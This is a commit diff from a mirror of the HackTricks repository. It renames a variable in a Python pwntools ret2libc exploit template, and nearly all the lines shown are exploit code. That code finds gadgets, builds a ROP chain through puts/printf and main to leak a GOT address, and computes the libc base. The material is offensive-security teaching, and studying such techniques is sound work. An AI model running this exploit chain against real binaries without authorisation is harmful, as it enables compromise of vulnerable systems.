mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [master] one page modified
This commit is contained in:
parent
307eb099ba
commit
bceb2bdadc
|
@ -62,10 +62,10 @@ if OFFSET == b"":
|
||||||
#### Find Gadgets ###
|
#### Find Gadgets ###
|
||||||
#####################
|
#####################
|
||||||
try:
|
try:
|
||||||
print_func = "puts"
|
libc_func = "puts"
|
||||||
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
||||||
except:
|
except:
|
||||||
print_func = "printf"
|
libc_func = "printf"
|
||||||
PUTS_PLT = ELF_LOADED.plt['printf']
|
PUTS_PLT = ELF_LOADED.plt['printf']
|
||||||
|
|
||||||
MAIN_PLT = ELF_LOADED.symbols['main']
|
MAIN_PLT = ELF_LOADED.symbols['main']
|
||||||
|
@ -97,9 +97,9 @@ def generate_payload_aligned(rop):
|
||||||
return payload1
|
return payload1
|
||||||
|
|
||||||
|
|
||||||
def get_addr(print_func):
|
def get_addr(libc_func):
|
||||||
FUNC_GOT = ELF_LOADED.got[print_func]
|
FUNC_GOT = ELF_LOADED.got[libc_func]
|
||||||
log.info(print_func + " GOT @ " + hex(FUNC_GOT))
|
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
|
||||||
# Create rop chain
|
# Create rop chain
|
||||||
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||||
rop1 = generate_payload_aligned(rop1)
|
rop1 = generate_payload_aligned(rop1)
|
||||||
|
@ -117,11 +117,11 @@ def get_addr(print_func):
|
||||||
# Parse leaked address
|
# Parse leaked address
|
||||||
log.info(f"Len rop1: {len(rop1)}")
|
log.info(f"Len rop1: {len(rop1)}")
|
||||||
leak = u64(recieved.ljust(8, b"\x00"))
|
leak = u64(recieved.ljust(8, b"\x00"))
|
||||||
log.info(f"Leaked LIBC address, {print_func}: {hex(leak)}")
|
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
|
||||||
|
|
||||||
# Set lib base address
|
# Set lib base address
|
||||||
if LIBC:
|
if LIBC:
|
||||||
LIBC.address = leak - LIBC.symbols[print_func] #Save LIBC base
|
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
|
||||||
log.info("LIBC base @ %s" % hex(LIBC.address))
|
log.info("LIBC base @ %s" % hex(LIBC.address))
|
||||||
|
|
||||||
# If not LIBC yet, stop here
|
# If not LIBC yet, stop here
|
||||||
|
@ -131,7 +131,7 @@ def get_addr(print_func):
|
||||||
|
|
||||||
return hex(leak)
|
return hex(leak)
|
||||||
|
|
||||||
get_addr(print_func) #Search for puts address in memmory to obtains LIBC base
|
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue